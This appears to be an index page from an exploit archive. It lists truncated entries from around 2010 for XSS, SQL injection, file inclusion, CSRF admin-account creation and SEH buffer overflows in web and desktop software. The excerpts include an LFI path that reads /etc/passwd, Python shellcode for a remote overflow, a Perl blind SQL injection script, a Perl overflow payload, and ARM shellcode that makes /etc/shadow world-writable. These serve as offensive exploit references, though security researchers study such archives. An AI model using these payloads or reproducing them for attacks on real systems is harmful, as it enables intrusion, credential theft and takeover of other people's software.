Impact Software AdPeeps - Cross-Site Scripting / HTML Injection

source: https://www.securityfocus.com/bid/42071/info Impact Software Ad Peeps is prone to multiple cross-site scripting vulnerabilities and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content...

ECShop2. 5. x&2.6. x injection exploit-vulnerability warning-the black bar safety net

ECShop2. 5. x&2.6. x goodsscript.php no initialization SQL, leading to injection vulnerabilities Effect 2. 5. x and 2. 6. x,other versions not tested goodsscript. php44 line:injection / admin credentials disclosure exploit if emptyempty$GET'type' ... elseif $GET'type' == 'collection' ... $sql .=...

Freelancers Marketplace Script - Persistent Cross-Site Scripting

Freelancers Marketplace Script - Persistent Cross-Site Scripting Name : Freelancers Marketplace Script Persistent XSS Vulnerability Date : july 17,2010 Critical Level : HIGH vendor URL :http://www.guruscript.com/ google dork:Powered by Guruscript.com Author : Sid3^effects aKa HaRi special thanks ...

Cross-site Scripting (XSS) Vulnerabilities in Campsite

High-Tech Bridge SA Security Research Lab has discovered two vulnerabilities in Campsite which could be exploited to perform cross-site scripting attacks. 1 Cross-site scripting XSS vulnerabilities in Campsite 1.1 The vulnerability exists due to input sanitation error in the "fcommentsearch"...

Whizzy CMS 10.01 - Local File Inclusion

Whizzy CMS 10.01 - Local File Inclusion x Type: Local File Inclusion x Vendor: Unverse.net x Script Name: Whizzy CMS x Script version: 10.01 x Author: Anarchy Angel x Mail : anarchydotang31@gmaildotcom Exploit: http://site.org/?LFI Ex: http://site.org/?../../../../../../../etc/passwd Special Tnx ...

ASX To MP3 Converter 3.1.2.1 SEH Exploit

Exploit Title: ASX to MP3 Converter v3.1.2.1 SEH Exploit Multiple OS, DEP and ASLR Bypass Date: July 13, 2010 Author: Node Software Link: http://www.mini-stream.net/downloads/ASXtoMP3Converter.exe Version: Mini-Stream Software ASX to MP3 Converter v3.1.2.1.2010.03.30 Evaluation Tested on: Windows...

Apple Mac OSX EvoCam Web Server (Snow Leopard) - ROP Remote Overflow

!/usr/bin/python EvoCam Web Server OSX 3.6.6 and 3.6.7 import socket import struct SHELL = "\xdb\xd2\x29\xc9\xb1\x27\xbf\xb1\xd5\xb6\xd3\xd9\x74\x24" "\xf4\x5a\x83\xea\xfc\x31\x7a\x14\x03\x7a\xa5\x37\x43\xe2" "\x05\x2e\xfc\x45\xd5\x11\xad\x17\x65\xf0\x80\x18\x8a\x71"...

Family Connections Who is Chatting AddOn - Remote File Inclusion

Family Connections Who is Chatting AddOn - Remote File Inclusion ======================================================= Who is Chatting 2.2.3 Remote File Include Vulnerability ======================================================= Author : lumut-- Script Details :...

cPanel 11.25 - Cross-Site Request Forgery (Add FTP Account)

Exploit Title: Cpanel 11.25 - CSRF Add FTP Account Author: G0D-F4Th3r Software Link: http://www.cpanel.net/ Version: 11.25 Exploit Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My Friends...

ShopCartDx 4.30 Remote Blind SQL Injection Exploit

!/usr/bin/perl 0-Day ShopCartDx newGET = $Host; my $HTTP = new LWP::UserAgent; my $Referrer = "http://www.warwolfz.org/"; my $DefaultTime = request$Referrer; sub BlindSQLJnjection my $dec,$hex = @; return "./products.php?cid=-1 OR 1!=SELECT...

Gekko CMS (SQL Injection) Vulnerability

No description provided by source. 2-SQL injection Vulnerability Description: SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for strin...

linux/ARM chmod("/etc/shadow", 0777) Shellcode 35 Bytes

Exploit for linux/x86 platform in category shellcode ======================================================= linux/ARM chmod"/etc/shadow", 0777 Shellcode 35 Bytes ======================================================= / | Title: Linux/ARM chmod"/etc/shadow", 0777 Shellcode 35 Bytes | Type:...

Allomani Super Multimedia 2.5 Cross Site Request Forgery

Exploit Title: Allomani - Super Multimedia v2.5 - CSRF Add Admin Account Date: 29-06-2010 Author: G0D-F4Th3r Software Link: http://demos.allomani.com/media250/ Version: 2.5 Tested on: http://demos.allomani.com/media250/ Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My...

Vodu CMS (XSS/URL Redirecting) Multiple Vulnerability

Exploit for php platform in category web applications ===================================================== Vodu CMS XSS/URL Redirecting Multiple Vulnerability ===================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' ...

Ceica-GW - 'login.php' Cross-Site Scripting

source: https://www.securityfocus.com/bid/40917/info Ceica-GW is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of t...

Bilder Upload Script Datei Upload 1.09 - Arbitrary File Upload

InformatioN Homepage: http://www.joomlaservice.info Or http://www.dz4all.com Vendor : http://www.php-space.info/bilder-upload-script/ Download: http://www.php-space.info/bilder-upload-script/bilder-upload-script1.09.rar Email : [email protected] Dork : allinurl: In YoUr Dream Lamerz exploit :...

Allomani And Clips 2.7.0 Cross Site Request Forgery

Exploit Title: Allomani & Clips v2.7.0 - CSRF Add Admin Account Date:25 -06-2010 Author: G0D-F4Th3r Software Link: http://demos.allomani.com/songs270/ Version: 2.7.0 Tested on: http://demos.allomani.com/songs270/ Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My Friends...

Big Forum SQL injection Vulnerability

No description provided by source. =================Exploit================== EXPL0!T http://server/path/forum.php?id=3SQL =========================================================== Greetz to : Alnjm33-virus-pal -g3n1ux - Predator-Ahmadso - xXx-jago-dz -inejcteur-4PY-SaYrOs- XR57 -Tr0y-x -alsaek...

Allomani Songs & Clips 2.7.0 - Cross-Site Request Forgery (Add Admin)

Exploit Title: Allomani & Clips v2.7.0 - CSRF Add Admin Account Date:25 -06-2010 Author: G0D-F4Th3rG0D-F4Th3r Software Link: http://allomani.com Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My Friends...

BlazeDVD 6.0 - '.plf' File Universal Buffer Overflow (SEH)

Exploit Title : BlazeDVD v6 .plf SEH universale Buffer Overflow tested on windows xp SP 3 FR Author: MadjiX Dz8 HotmaiL cOm Greets:Bibi-info , His0k4 where are you : my $file= "MadjiX.plf"; my $junk="\x41" x 608; my $nseh="\xeb\x06\x90\x90"; my $seh= pack'V',0x100157F5; my $nops="\x90" x 24; calc...